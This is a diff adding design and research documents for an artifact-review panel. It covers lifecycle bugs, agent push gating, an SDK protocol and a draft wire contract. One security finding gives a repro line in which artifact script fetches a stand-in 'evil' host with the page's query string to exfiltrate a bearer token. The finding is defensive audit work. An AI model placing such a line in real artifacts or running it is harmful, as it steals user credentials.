+  drain, the new verbs (dismiss/refresh/update), and `data-aod-*` authoring. Update the CLAUDE.md directive
+  that currently names open/poll/reply/end to add await/update/refresh/dismiss.
+
+### P1 acceptance criteria
+- Unit (consumer): `POST /:id/actions` → `artifact_await` returns a `{kind:"action", action, elementId,
+  value?}` event with a monotonic `id`; SDK unit (jsdom) posts `artifact-action` for a `data-aod-*` button
+  and does NOT for a plain button; `artifact_update({html})` writes only within the sandbox (out-of-base or
+  html-without-file → INVALID_REQUEST); an `approve` action with a pending `ExitPlanMode` calls the respond
+  path (mock), not the PTY.
+- Unit (producer): renderer emits well-formed `data-aod-*`; drain loop acks and does not double-process an
+  event id; `artifact_dismiss`/`artifact_refresh` happy paths.
+- **e2e (extend `56-…`, P1 slice):** open an **interactive** plan → click an `Approve` button in the iframe
+  → assert the agent's `artifact_await` returns the `action` event once → agent acks → click again →
+  assert single delivery per activation.
+
+---
+
+## Phase P2 — polish + real presence + full e2e
+
+- **C-P2-1** Real presence over SSE (`presence.state` from the transcript signal, contract §6); panel
+  reflects `working|idle_at_prompt|awaiting_input` instead of the client-optimistic guess.
+- **C-P2-2** Maximize a11y (focus into composer), plan-state visual polish, background-tab reply badge.
+- **P-P2-1** `internal-artifact-open` hook: **stays STATIC** (contract §9 / OQ6). Auto-open on ExitPlanMode
+  keeps rendering plan markdown to a static sibling artifact — it does NOT emit interactive `data-aod-*`
+  markup in v2. Interactive is opt-in via explicit `artifact_open({mode:"interactive"})`/`artifact_update`.
+  Task here is just a regression test that auto-open still works and is unaffected by the v2 changes.
+- **AC:** presence flips to `working` when the transcript shows an in-progress turn and `awaiting_input`
+  on a pending tool; full e2e covers open→annotate→action→reply→update→refresh→dismiss→re-open→end with
+  chat/queue integrity across a simulated SSE drop.
+
+---
+
+## Integration / cross-repo verification (run after each phase)
+
+Both repos are already checked out on this host (`C:\Users\anikundu\Software\ai-or-die` and
+`…\github-router`). The producer instance implements its half; the consumer instance implements this half;
+integration is driven HERE:
+
+1. Build/install consumer: `npm ci` in ai-or-die; run the unit gate (`npm test`) on Windows + Linux.
+2. Point the launcher at the local github-router build (the bridge already launches claude via
+   `npx github-router` — use the local checkout instead) so the new MCP tools are live.
+3. Launch an ai-or-die session; have the agent call `artifact_open({mode:"interactive"})` on a rendered
+   plan; drive the panel with Playwright (`e2e/tests/56-artifact-panel-v2.spec.js`): annotate, click a
+   `data-aod-*` control, assert the agent's `artifact_await` sees the typed event, assert `artifact_reply`
+   renders once, exercise dismiss/re-open/update/refresh/end.
+4. Multi-select check in situ: render an interactive artifact with a `data-aod-group` of checks + a
+   `submit`; toggle a subset, click submit, and assert the agent's `artifact_await` sees ONE `action`
+   event whose `selected[]` is exactly the toggled set (and `check` toggles emitted no events).
+5. Attest the contract invariants (§11) hold end to end before declaring a phase done; consult the advisor
+   on the P0 idle-gate change before merge (mandatory per project rules: input paths).
+
+## Risks / watch-items
+- The `idleAtPrompt` classification must not regress `detectAwaiting`'s existing control/session-status
+  callers (`server.js:4303,5045`) — extend, don't repurpose.
+- Legacy `/poll` projection must losslessly represent `comment` events or old agents regress — cover with a
+  back-compat test.
+- Multi-select: the SDK's per-group checked set must reset correctly on artifact reload/update so a stale
+  selection can't be submitted against re-rendered ids — cover in the SDK unit test.
+- Producer/consumer must land SSE-only render together enough that a mixed build never renders replies
+  twice; sequence C-P0-1 with the producer's client build.

--- a/docs/research/artifact-panel-v2-consumer-brief.md
+++ b/docs/research/artifact-panel-v2-consumer-brief.md
@@ -1,0 +1,453 @@
+# Artifact Panel v2 — Consumer-Side Research & Design Brief
+
+Status: research (read-only). Freshness: main @ `68ef947` (2026-07-02). Author: implementer instance.
+Scope: the ai-or-die CONSUMER side of the artifact-review loop — browser panel, injected
+SDK, server push routes, bridge injection. Producer side (github-router MCP tools + plan→HTML
+renderer + skill) is a separate instance; §7 is the seam to converge with it.
+
+Background ADRs: `docs/adrs/0033-remote-artifact-review.md` (the loop), `docs/adrs/0035-artifact-panel-maximized-split-and-push.md` (split layout + idle-gated push).
+
+Files in scope (line counts): `src/public/artifact-panel.js` (700), `src/artifact-sdk-client.js` (564),
+`src/artifact-review.js` (1088), `src/base-bridge.js` (831), `src/public/components/artifact-panel.css` (271),
+`src/server.js` (push wiring), `src/control/jsonl-awaiting.js` (173), `test/control/artifact-routes.test.js` (466).
+
+---
+
+## 0. Executive summary
+
+The loop works but is **half push-based, structurally free-text-only, and carries one real token-leak**.
+
+- **agent→human is push (two overlapping paths, SSE + WS — they double-render replies).**
+- **human→agent is push only under a heuristic idle gate** that keys on PTY output-quietness and
+  *ignores the transcript "awaiting user input" signal that already exists in-repo* (`detectAwaiting`).
+  The worst injection case (a pending ExitPlanMode / AskUserQuestion / permission menu) is exactly
+  when the PTY is quiet, so the current gate is most likely to misfire precisely when it is most harmful.
+- **Every feedback channel is free text.** The SDK captures annotate-a-block / comment-on-selection
+  and flattens to a prompt string. There is **no structured action/button/plan-step channel** in any
+  layer (SDK → panel → server → agent). This is the biggest v2 gap.
+- **Client-side lifecycle has concrete data-loss and UX dead-ends:** dismiss (×) is a one-way hide with
+  no re-open; tab-switch silently clears the queued pills and wipes chat history; background-tab agent
+  replies are dropped; SSE reconnect loses replies delivered during the gap.
+- **Security:** the panel loads the artifact iframe with the user's **bearer token in the URL query**
+  (`?token=<bearer>`) under `sandbox="allow-scripts allow-same-origin"`, so artifact JS can read
+  `location.search` and exfiltrate the full bearer. Treat as Critical for any non-trusted artifact.
+- **Tests:** the router + push-gate *logic* is well covered; the client panel, the SDK, SSE handling,
+  double-delivery, and the whole interactivity surface are **untested**.
+
+---
+
+## 1. Lifecycle: mount / show / hide / dismiss / end
+
+### Mount
+- `ArtifactPanel` is constructed lazily once per page in `src/public/app.js:255` (guarded by the script
+  having loaded). DOM built in `_buildDom` (`artifact-panel.js:95`) and appended to `.terminal-wrapper`
+  (`artifact-panel.js:147-148`). One panel instance is shared across all tabs; only `activeSessionId`
+  renders (`reviews` Map keyed by sessionId, `artifact-panel.js:48,55`).
+
+### Open / show
+- Server broadcasts `artifact_review_opened` on agent `artifact_open` (`artifact-review.js:740-747`) →
+  WS dispatch `app.js:2849-2851` → `panel.open(message)` (`artifact-panel.js:352-364`). `open` stores the
+  review with a **client-token** viewUrl (rebuilt from the browser's own bearer, never the broadcast's),
+  and if it is the active session calls `_show` (`362`).
+- `_show` (`402-417`): on a session change it wipes `_chatLog.innerHTML=''` and `_clearQueue()`, sets the
+  iframe `src`, connects SSE, `el.hidden=false`, then `_clampToBounds()`.
+
+### Refresh / reload — **control EXISTS**
+- Header reload button `↻` (`artifact-panel.js:101,105`) → `reload()` (`430-437`): cache-busts the iframe
+  `src` with `&_r=<ms>`. Preserves `_queue` (queue lives in the panel, not the iframe) and scroll is
+  replayed on load (`_onIframeLoad`, `447-455`).
+- Server-driven auto-reload: chokidar watches the artifact file (`artifact-review.js:690-712`), on a
+  settled write broadcasts `artifact_review_reload` → `app.js:2857` → `reloadReview` (`441-445`) →
+  `reload()`. Only the ACTIVE tab reloads.
+
+### Dismiss — **control EXISTS but is a one-way dead-end (BUG)**
+- Header `×` (`artifact-panel.js:104,108`) → `collapse()` (`422`): sets `_collapsed=true`, `_hide()`
+  (hides + tears down SSE), emits state. **It does NOT POST `/end`, does NOT notify the agent, and there
+  is no UI affordance to re-open a collapsed panel for the same session.** `expand()` (`423-427`) exists
+  but nothing in the panel chrome calls it. Once dismissed, the only way the panel returns is a fresh
+  server `artifact_review_opened` (agent re-opens) or a session switch that re-`_show`s. See §5-bug-4.
+
+### End (`/end`) — end-to-end (agent-driven only)
+- `POST /:sessionId/end` (`artifact-review.js:965-972`): sets `review.status='ended'`, `stopWatch`,
+  emits `ended`, broadcasts `artifact_review_ended`.
+- SSE `onEnded` (`933-938`) pushes an `ended` event then `res.end()`. Poll returns `next_step:'ended'`
+  (`989-991`).
+- Client: WS `artifact_review_ended` → `app.js:2853` → `endReview` (`366-373`): deletes the review,
+  tears down SSE, clears queue, hides. SSE `ended` handler also calls `endReview` (`673`).
+- **Who calls `/end`?** Only the agent side (github-router `artifact_*` tools) or curl. The panel `×`
+  does **not**. So "end" is entirely producer-driven; the human has no button to end a review.
+
+### Queued feedback across refresh / dismiss / reconnect
+- **Refresh (reload):** `_queue` survives (panel-owned); the iframe's in-flight annotation card is lost
+  (acceptable). Fine.
+- **Dismiss (collapse):** does not clear the queue (only hides). But it also cannot be re-shown, so the
+  queue is effectively stranded until a re-open.
+- **Tab switch:** `notifyActiveSessionChanged` (`387-393`) unconditionally `_clearQueue()` → **queued but
+  unsent pills are silently dropped** (§5-bug-3). `_show` also wipes `_chatLog` on session change and
+  never rehydrates from server `review.chat` → **chat history lost** (§5-bug-2).
+- **SSE reconnect:** `EventSource` auto-retries, but there is **no `Last-Event-ID` replay**; agent
+  replies delivered during the gap are lost (server keeps `review.chat` but never re-sends it). Presence
+  flaps connected=false/true (`artifact-review.js:959-962`). See §5-bug-5.
+
+---
+
+## 2. Push in both directions
+
+### agent → human (push; but DOUBLE path)
+- Agent posts `POST /:sessionId/agent-reply` (`artifact-review.js:1060-1070`) → `addAgentReply`
+  (`298-312`) appends `review.chat`, emits `agent-reply`, AND `broadcastToSession('artifact_agent_reply')`.
+- **Path A (SSE):** `events` stream `onAgentReply` (`925-928`) → panel SSE listener (`artifact-panel.js:655-662`)
+  → `_appendChat('agent', …)` + forward to iframe.
+- **Path B (WS):** `artifact_agent_reply` → `app.js:2861` → `agentReply` (`375-385`) → `_appendChat` +
+  forward to iframe.
+- **Both fire when the panel is shown** (SSE connected AND WS live) → the reply renders twice. See §5-bug-1.
+
+### human → agent (queue + long-poll + idle-gated push)
+- **Queue/poll (durable source of truth):** `POST /prompts` (`artifact-review.js:836-890`) → `queuePrompts`
+  → emits `feedback`; `GET /poll` long-holds (`974-1058`) and delivers, destructive-read via
+  `ackFeedback`. Active-poll count tracked in `activePolls` (`666-671`).
+- **Idle push (ADR-0035, default ON):** in `POST /prompts`, if `pushToAgent` is wired AND no poll is in
+  flight (`hadActivePoll` snapshot `847`), it claims the feedback (`ackFeedback`, `868`) then calls
+  `pushToAgent(sessionId, text)` (`870-872`) with a 4s race timeout; on failure re-queues to the FRONT
+  (`restoreClaimedFeedback`, `877-881`).
+- **Server hook** `_pushArtifactFeedbackToAgent` (`server.js:4138-4155`): finds the bridge via
+  `_bridgeForSession` (`4118-4130`), applies the **second gate** — `msSinceLastOutput(sessionId)` must
+  exceed `_artifactPushQuietMs` (default 1500ms, `server.js:176`) — then injects `buildArtifactPushPayload`
+  (bracketed-paste + trailing CR) via `bridge.sendInput`.
+- Wiring: router built at `server.js:1273-1284`; `pushToAgent` passed only when
+  `artifactPushEnabledFromEnv(process.env.AIORDIE_ARTIFACT_PUSH)` (`server.js:174,1281-1283`).
+- **1:1 identity confirmed:** the artifact review sessionId is `AIORDIE_SESSION_ID`
+  (`server.js:4612`), which is the same value used as the bridge PTY session id in `bridge.sendInput`.
+  Env trio injected at spawn in `_artifactEnvForSession` (`server.js:4607-4617`); the JSONL binding
+  sidecar `AIORDIE_CLAUDE_BIND` is set alongside (`server.js:4676`, `5333`).
+
+### CRITICAL — residual risk of the idle gate (ADR-0035) and a concrete hardening
+
+**The gate today is `!hadActivePoll` (router) AND `msSinceLastOutput > 1500ms` (server).** Neither proves
+the agent is idle *at a free-text prompt*:
+
+1. A mid-turn-but-silent agent (thinking, or blocked on a slow tool) has a quiet PTY → the gate passes →
+   a bracketed-paste injection races the TUI. ADR-0035 accepts this as "likely deferred, not corrupted"
+   because Claude Code buffers stdin.
+2. **The far worse case the ADR under-weights:** when the CLI is sitting on a *user-facing menu*
+   (ExitPlanMode plan approval, AskUserQuestion, a permission prompt), the PTY is **maximally quiet** —
+   so the gate is *most* likely to fire — and a bracketed-paste + CR will submit the human's free-text
+   note straight into the menu (selecting an arbitrary option / answering the wrong question). This is a
+   correctness-and-safety failure, not a cosmetic interleave.
+
+**The signal to fix it already exists and is unused by the push path.** `src/control/jsonl-awaiting.js`
+`detectAwaiting(file)` (`12-42`) reads the bounded tail of the Claude JSONL transcript and returns a
+non-null descriptor `{ pendingUserFacingTool: 'ExitPlanMode'|'AskUserQuestion'|'permission', awaitingPrompt?, awaitingOptions? }`
+whenever the last assistant turn left a user-facing `tool_use` with no matching `tool_result`
+(`23-38`, `81-119`). It is already called for control/session-status at `server.js:4303` and `5045`
+(via `_controlDetectAwaitingCached`, `4299-4307`) — but **the artifact push gate does not consult it at
+all**. The binding is deterministic (ADR-0026), bounded (256 KB tail), fail-safe (returns null on any
+error), and reflects *semantic* turn state rather than *render timing* — strictly better than PTY-quiet.
+
+**Proposed hardening (consumer side, small + testable):** make the transcript the PRIMARY gate in
+`_pushArtifactFeedbackToAgent`:
+- Resolve the session's JSONL binding (same `this._stickyJsonl.get(sessionId)` path as `5044`).
+- If `detectAwaiting(binding.file)` returns **non-null** → a user-facing tool is pending → **HARD-DECLINE
+  the push** (leave it queued for `artifact_poll`, or, better, route it to the structured `respond` path
+  — see §4/§7). Never bracketed-paste into a menu.
+- Positive idle signal: only push when the transcript's last non-sidechain event is an assistant turn
+  with no unresolved `tool_use` (i.e. the turn is complete and the CLI is at the free-text prompt). This
+  is a small extension of `detectAwaiting` (add a `turnComplete`/`idleAtPrompt` classification).
+- Keep `msSinceLastOutput > quiet` as a cheap secondary guard (covers the render-in-progress window and
+  the no-binding fallback, e.g. raw `claude.exe` whose project slug doesn't resolve — same fallback shape
+  already used at `server.js:5050`).
+- Cache the read (the control path already caches for 1s at `4302`) so per-`/prompts` cost is bounded.
+
+This tightens ADR-0035's "follow-up" that the ADR itself names (0035 lines 74-78) into a concrete gate.
+
+---
+
+## 3. SDK protocol (`src/artifact-sdk-client.js`) — every postMessage type
+
+Source strings: iframe→panel is `source:'ai-or-die-artifact-sdk'` (`SDK_SOURCE_IN`); panel→iframe is
+`source:'ai-or-die-artifact-host'` (`HOST_SOURCE_OUT`). Panel authenticates the iframe by
+`event.source === iframe.contentWindow` (`artifact-panel.js:464`); the SDK authenticates the host by
+`event.source === window.parent` and a sessionId match (`artifact-sdk-client.js:433-441`).
+
+### iframe → panel (SDK emits)
+| type | payload | emitted at | panel handler |
+|---|---|---|---|
+| `artifact-ready` | `{ domSnapshot }` | `563` | `artifact-panel.js:469-473` sets `review.ready` |
+| `artifact-annotation-queued` | `{ annotation }` | `283` | `474-477` → `_enqueueAnnotation` (pill) |
+| `artifact-annotations-send` | `{ domSnapshot }` | `287` | `478-481` → `_sendQueue` |
+| `artifact-snapshot` | `{ domSnapshot }` | `450` (reply) | `482-491` flushes pending snapshot send |
+| `artifact-scroll` | `{ x, y }` | `473` | `492-496` stores scroll for reload replay |
+| `artifact-prompts` (legacy) | `{ prompts, domSnapshot }` | `529` | `502-509` POSTs `/prompts` immediately |
+| `artifact-layout-warnings` (legacy) | `{ layout_warnings }` | `538` | `510-514` POSTs `/layout-warnings` |
+
+### panel → iframe (host sends)
+| type | payload | sent at | SDK handler |
+|---|---|---|---|
+| `set-annotation-mode` | `{ enabled }` | `454` | `443-445` toggles annotate mode + cursor CSS |
+| `request-snapshot` | `{}` | `571` | `446-451` replies `artifact-snapshot` |
+| `restore-scroll` | `{ x, y }` | `453` | `452-455` `window.scrollTo` |
+| `agent-reply` | `{ text }` | `381,659` | `456-458` dispatches `ai-or-die-artifact-agent-reply` CustomEvent |
+| `presence` | `{ …presence }` | `671` | `459-461` dispatches `ai-or-die-artifact-presence` CustomEvent |
+
+### Annotation capture
+- **Click a block:** capture-phase `click` (`494,502-511`) → `showAnnotationCard(target)`.
+- **Select text:** capture-phase `mouseup` (`494-500`) → `textSelectionContext` (`171-202`) → card with a
+  text-range `target` (selector + start/end boundaries `162-169`).
+- The shadow-DOM card (`363-429`): textarea; **Enter queues**, **Cmd/Ctrl+Enter sends the batch now**,
+  **Esc cancels** (`414-427`). Queue is panel-owned; the SDK only emits intents.
+- Annotation object (`buildAnnotation`, `290-301`): `{ uid, selector, tag, text, prompt, sourceLine?, target? }`.
+  `sourceLine` comes from the nearest `data-source-line` ancestor (`118-128`) — the renderer's source map.
+
+### Interactive controls today
+- **None.** `isInteractiveControl` (`209-217`) deliberately EXCLUDES native `button/input/select/textarea/
+  option/label/summary/[contenteditable]` from annotation so they "behave natively" (`219-221`) — but
+  there is **no channel for those native controls to post anything back to the agent**. The only feedback
+  primitive is annotate + free-text comment. No buttons, no forms, no action callbacks, no typed events.
+
+---
+
+## 4. Interactivity gaps — what buttons + interactive plan steps require
+
+Goal: an artifact declares **actions** (buttons) and **plan steps** (approve / edit / check) that post
+**structured** events the agent receives as typed data, not prose.
+
+The transport (queue → poll → idle-push, destructive-read, SSE reply) is reusable as-is. What is missing
+is a **typed lane end to end**:
+
+1. **Declaration (producer + SDK).** Let the artifact mark actionable elements. Two viable styles:
+   - Declarative DOM: `data-aod-action="approve"`, `data-aod-value=…`, `data-aod-plan-step="3"`,
+     `data-aod-kind="approve|edit|check"`. SDK scans/listens for these.
+   - JS API: extend `window.aiOrDieArtifact` (`545-560`) with `action(id, payload)` /
+     `declareActions(manifest)`.
+   Either way the SDK must **not** suppress these via `isInteractiveControl`; it needs a dedicated
+   listener that fires on the declared controls and posts a structured message instead of opening the
+   comment card.
+
+2. **New SDK→panel message** (proposed): `artifact-action`
+   `{ actionId, kind, value, stepId?, edit?, context, domSnapshot? }`. Panel forwards it to a typed
+   server route. Plan-step controls post `{ stepId, kind:'approve'|'reject'|'edit', edit?:string }`.
+
+3. **New / extended server route.** Either a new `POST /:sessionId/actions` or a typed variant of
+   `/prompts` that keeps actions **distinct from free-text prompts**. Today `queuePrompts` stores opaque
+   items and `formatFeedbackForAgent` (`artifact-review.js:106-124`) flattens everything to a text block —
+   that lossy flatten is exactly what a structured channel must avoid. The poll payload
+   (`pollPayload`, `607-621`) needs an `actions:[…]` field parallel to `prompts`.
+
+4. **Agent-side typing (producer seam).** `artifact_poll` must surface the structured actions as typed
+   tool output (e.g. `{ prompts:[…], actions:[{stepId, kind, edit}] }`) so the agent branches on the
+   decision rather than parsing English. This is the frozen-contract boundary with the github-router
+   instance (§7).
+
+5. **Idle-push interaction.** A structured approve/reject should NOT be bracketed-pasted as free text.
+   When a plan-approval action arrives and the transcript shows a pending `ExitPlanMode`
+   (`detectAwaiting` → `pendingUserFacingTool:'ExitPlanMode'`), the right move is the **structured respond
+   path** (`_controlRespond`, `server.js:5037+`, which already maps a choice to the pending tool), not a
+   PTY paste. This ties §2's hardening and §4's action lane together: the transcript signal both blocks
+   the wrong injection and *routes* the right structured response.
+
+---
+
+## 5. Reliability / correctness bugs (concrete, with repro)
+
+1. **Double agent-reply render (Important).** SSE `onAgentReply` (`artifact-panel.js:655-662`) and WS
+   `agentReply` (`375-385`) both `_appendChat` when the panel is shown. Repro: agent calls
+   `artifact_reply` with the panel open → the reply appears twice. Fix: pick one channel (WS is redundant
+   with SSE while shown), or de-dupe by a reply id/timestamp (`review.chat` entries already carry `at`).
+
+2. **Chat history wiped on tab switch / re-show (Important).** `_show` (`405-410`) does
+   `_chatLog.innerHTML=''` on session change; server keeps `review.chat` (`298-312`) but never
+   rehydrates. Repro: switch away and back → chat empty though replies exist server-side. Fix: add a
+   `GET /:sessionId/history` (or include chat in an SSE hello) and repaint on `_show`.
+
+3. **Queued annotations silently dropped on tab switch (Important, data loss).**
+   `notifyActiveSessionChanged` (`387-393`) unconditionally `_clearQueue()`. Repro: queue two pills,
+   switch tab, switch back → pills gone, never sent. Fix: keep the queue per-session in the `reviews` Map,
+   not in a single shared `_queue`.
+
+4. **Dismiss (×) is a one-way dead-end (Important, UX).** `collapse()` (`422`) hides with no re-open
+   affordance and does not notify the agent/end the review. Repro: click × → panel gone; no button brings
+   it back for that session; the agent still believes the review is open. Fix: add a re-open affordance
+   (a pill/badge) wired to `expand()`, and/or a real "End review" action that POSTs `/end`.
+
+5. **SSE reconnect loses replies + flaps presence (Important).** No `Last-Event-ID` replay
+   (`events`, `903-963`); a reply delivered during a dropped SSE is lost. Repro: network blip during an
+   agent reply. Fix: buffer `review.chat` with monotonic ids and replay on `(re)connect`.
+
+6. **Background-tab replies dropped entirely (Important).** WS `agentReply` no-ops unless
+   `sessionId === activeSessionId` (`artifact-panel.js:379`), and SSE only connects for the active
+   session (`_connectSse`, `645-674`). Repro: tab A review open, switch to tab B, agent in A replies →
+   A's chat never gets it, even after switching back (see bug 2). Fix: persist per-session chat and
+   rehydrate.
+
+7. **Presence is fake (Important).** `'working'/'listening'` is purely client-optimistic — set on send
+   (`591`), cleared on reply or POST-settle (`607`). The server never pushes real agent turn-state; SSE
+   `presence` only carries `{connected,lastSeen}` and never sets `presence.state` (`929-932`,
+   `artifact-review.js:314-322`). Repro: send a note, agent is actually busy on another turn → panel says
+   "Listening"; or agent replies out-of-band → stale "Working…". Fix: derive real presence from the
+   transcript turn/awaiting signal (§2) and push it over SSE as `presence.state`.
+
+8. **Note composer has no failure recovery (Important, inconsistent).** `_submitNote` (`615-621`) is
+   fire-and-forget: it echoes the note to chat and POSTs, with no queue-restore on failure (unlike
+   `_sendQueue`, `600-612`). Repro: type a note, network fails → note is lost though chat shows it as
+   sent. Fix: mirror `_sendQueue`'s restore-on-failure.
+
+9. **Bearer token leaks into the artifact iframe (CRITICAL, security).** `_show` sets the iframe `src`
+   from `_authUrl('/view', …)` (`357,409`), which appends the user's **bearer** as `?token=<bearer>`
+   (`_authUrl`, `339-343` → `authManager.appendAuthToUrl`). The iframe is
+   `sandbox="allow-scripts allow-same-origin"` (`artifact-panel.js:115`), so the artifact document runs
+   same-origin and can read `location.search` → the full bearer. Repro: an artifact containing
+   `fetch('https://evil/'+location.search)` exfiltrates the session bearer; with it an attacker has full
+   authed API access. Note the *asset* sub-resources already avoid this by using a per-session HMAC
+   path-token (`_auth/<mint(sessionId)>/…`, `artifact-review.js:569-575,810-818`) that is NOT the bearer —
+   but `/view` itself is still fetched with the bearer in the URL. Fix: serve `/view` via a one-time view
+   ticket / the same scoped path-token pattern instead of `?token=<bearer>`; and/or drop
+   `allow-same-origin` if the SDK can be reworked to not need it. **Mandatory adversarial review on this
+   one.**
+
+10. **Token-in-asset-path is readable by the artifact (Low).** The scoped asset token sits in the
+    artifact's `<base href>` and any artifact script can read `document.baseURI` to reach sibling assets
+    under the sandbox base. Bounded to the artifact directory + timing-safe verified (`577-587`), so low
+    severity — but worth stating in the threat model alongside bug 9.
+
+11. **Idle-push can fire on a menu (CRITICAL, correctness) — see §2.** The PTY-quiet gate is most likely
+    to pass exactly when a user-facing tool menu is up. Repro: agent hits ExitPlanMode; human types a
+    note in the composer; push injects it + CR → answers the plan menu. Fix: transcript gate (§2).
+
+12. **Maximized layout minor notes (Suggestion).** The split grid (`artifact-panel.css:216-271`) is CSS-
+    only and reverts under 1024px — sound. The iframe is not reloaded on maximize (good, no scroll jump).
+    No functional bug found; call out that focus is not moved into the composer on maximize (a11y polish).
+
+---
+
+## 6. Test coverage & gaps
+
+### Present
+- **`test/control/artifact-routes.test.js` (466 lines) — strong on router + push-gate logic.** Covers:
+  open→view SDK+asset-base injection (`144-167`), markdown shell vs html passthrough (`169-221`),
+  prompts→poll-once destructive read (`223-244`), asset traversal 403 (`246-264`), out-of-base file 403
+  (`266-280`), poll long-hold-then-resolve (`282-302`), and the push suite (`304-465`):
+  `formatFeedbackForAgent` (`305-315`), `artifactPushEnabledFromEnv` default-on/opt-out (`317-326`),
+  `buildArtifactPushPayload` ESC/control-byte sanitization + envelope integrity (`328-344`),
+  push-consumes-queue when no poll (`346-367`), no-push-while-poll-in-flight (`369-388`), decline leaves
+  queue (`390-405`), no-hook unchanged (`407-418`), hung-push timeout restore (`420-435`),
+  claim-before-await no-double-deliver (`437-464`).
+- **e2e `55-artifact-panel-chrome.spec.js` — ONE test** (`82`): drag / resize / minimize / persistence /
+  off-screen clamp. Real-browser chrome only.
+
+### Not the artifact panel
+- `53-plan-viewer.spec.js`, `54-plan-detection-pipeline.spec.js` test the **terminal plan-mode detector**
+  (the xterm plan indicator + modal, `plan-detector.js`) — a *different* feature, not the artifact panel.
+- `17-install-panel.spec.js` is the tool-install UI — unrelated.
+
+### Gaps (what v2 must add)
+- **No unit test of `artifact-panel.js` at all** — none of show/hide/dismiss/reload, queue lifecycle,
+  SSE agent-reply/presence/ended handling, tab-switch behavior, `_sendQueue` restore-on-failure.
+- **No test of the SDK client** (`artifact-sdk-client.js`) — annotate, text-range, host-message auth,
+  legacy compat.
+- **No test of the server idle gate** `_pushArtifactFeedbackToAgent` (`server.js:4138`) — the
+  `msSinceLastOutput` decision is untested (only the router's mocked `pushToAgent` is).
+- **No test of `detectAwaiting` in the push path** (it isn't wired — §2).
+- **No test of double agent-reply (SSE+WS), chat rehydration, queue-drop-on-switch, dismiss dead-end,
+  background-tab replies, reconnect replay** — bugs 1-6.
+- **No security test** that the artifact cannot read the bearer / that `/view` auth isn't in the URL — bug 9.
+- **Nothing for the interactivity surface** (buttons, plan steps, structured action events) — it doesn't
+  exist yet.
+
+v2 target tests: an end-to-end panel test (open → annotate via SDK → send → agent poll+reply → reply
+renders once); action-button click → structured event → typed poll payload; plan-step approve → typed +
+routed to `respond`; dismiss → re-open; reload preserves per-session queue; reconnect replays chat;
+idle-gate declines on a pending user-facing tool.
+
+---
+
+## 7. First-draft WIRE CONTRACT (consumer vantage — to converge with the producer)
+
+Draft only. The producer instance owns the HTML renderer + `artifact_*` tool schemas; these are the
+shapes the CONSUMER needs on the wire. Names/fields are proposals, not frozen.
+
+### 7.1 Declarative markup the SDK recognizes (producer emits)
+```html
+<!-- a button/action -->
+<button data-aod-action="rerun" data-aod-value="section-3">Re-run section 3</button>
+<!-- an interactive plan step -->
+<li data-aod-plan-step="3" data-aod-step-title="Add retry/backoff">
+  <button data-aod-action="approve" data-aod-step="3">Approve</button>
+  <button data-aod-action="edit"    data-aod-step="3">Edit…</button>
+  <input  data-aod-action="check"   data-aod-step="3" type="checkbox">
+</li>
+```
+SDK contract: elements carrying `data-aod-action` are driven natively (not annotated) and, on activation,
+post `artifact-action` (below). `data-source-line` continues to carry the renderer source map.
+
+### 7.2 postMessage additions
+```jsonc
+// iframe -> panel  (source: "ai-or-die-artifact-sdk")
+{ "type": "artifact-action", "sessionId", "key",
+  "payload": { "actionId": "approve", "kind": "approve|reject|edit|check|custom",
+               "stepId": "3", "value": "…", "edit": "…optional user text…",
+               "context": { "selector", "sourceLine?", "text" }, "domSnapshot?": {…} } }
+
+// panel -> iframe  (source: "ai-or-die-artifact-host")
+{ "type": "action-ack",   "payload": { "actionId", "stepId", "ok": true } }   // optimistic UI confirm
+{ "type": "plan-state",   "payload": { "steps": [ { "stepId", "state": "pending|approved|rejected|done" } ] } }
+```
+
+### 7.3 Server routes (consumer needs)
+```jsonc
+// human -> agent, structured (distinct from free-text /prompts)
+POST /api/artifact/:sessionId/actions
+  body: { actions: [ { actionId, kind, stepId?, value?, edit?, context? } ], domSnapshot? }
+  -> { ok, pushed, queued }        // same idle-gate + claim/restore semantics as /prompts,
+                                   //   but plan-approval kinds route to the structured respond path,
+                                   //   NEVER bracketed-paste (see §2/§4)
+
+// agent -> human, structured turn/presence (make presence real)
+GET  /api/artifact/:sessionId/events   // + new SSE events:
+  event: presence   data: { state: "idle_at_prompt|working|awaiting_input", pendingTool? }
+  event: plan-state data: { steps: [ { stepId, state } ] }
+
+// history replay (fixes chat wipe + reconnect loss)
+GET  /api/artifact/:sessionId/history  -> { chat: [ { role, text, at, id } ], plan?: {…} }
+```
+
+### 7.4 Typed poll payload (extend `pollPayload`, `artifact-review.js:607`)
+```jsonc
+{ "status", "next_step",
+  "prompts":  [ … ],                       // existing free-text/annotation feedback
+  "actions":  [ { "actionId", "kind", "stepId?", "value?", "edit?" } ],   // NEW typed lane
+  "layout_warnings?": [ … ], "dom_snapshot?": {…} }
+```
+
+### 7.5 Dismiss / refresh / push (consumer-owned)
+```jsonc
+// dismiss becomes a real, agent-visible action (optional)
+POST /api/artifact/:sessionId/end      // wire the panel × to offer "End review" (today agent-only)
+// refresh already exists (client cache-bust + chokidar broadcast artifact_review_reload)
+// idle push: gate on transcript detectAwaiting() (PRIMARY) + msSinceLastOutput (secondary);
+//   plan-approval actions route to /control respond, not PTY paste.
+```
+
+### 7.6 Open integration questions for the producer instance
+- Does the plan renderer already emit stable `data-aod-plan-step` ids, or must the consumer derive them?
+- Should `artifact_poll` return `actions` inline with `prompts`, or a separate `artifact_actions` tool?
+- For plan approval, is the agent expected to be sitting on `ExitPlanMode` (route via `respond`), or is
+  it a free-turn approval (structured push)? The transcript `detectAwaiting` result disambiguates at
+  runtime — align on who inspects it (consumer server does today).
+- Presence source of truth: consumer derives `state` from the JSONL transcript; confirm the producer
+  does not also try to push presence (avoid a second double-path like agent-reply, §5-bug-1).
+
+---
+
+## Appendix — key file:line index
+- Panel lifecycle/DOM: `artifact-panel.js` — build `95-149`, show/hide `402-428`, dismiss `422`,
+  reload `430-445`, iframe-msg `458-515`, queue/pills `536-613`, note `615-621`, SSE `645-680`.
+- SDK: `artifact-sdk-client.js` — post `43-57`, annotate card `363-429`, host msgs `433-464`,
+  pointer `479-511`, legacy API `521-560`.
+- Server router: `artifact-review.js` — store `146-337`, push helpers `93-144`, view/asset `750-834`,
+  prompts+push `836-890`, events SSE `903-963`, end `965-972`, poll `974-1058`, agent-reply `1060-1070`.
+- Push wiring: `server.js` — flags `168-176`, router `1273-1284`, hook `4138-4155`, env trio `4607-4617`,
+  awaiting callsites `4303`,`5045`.
+- Idle signal: `control/jsonl-awaiting.js` — `detectAwaiting 12-42`, tool map `81-119`.
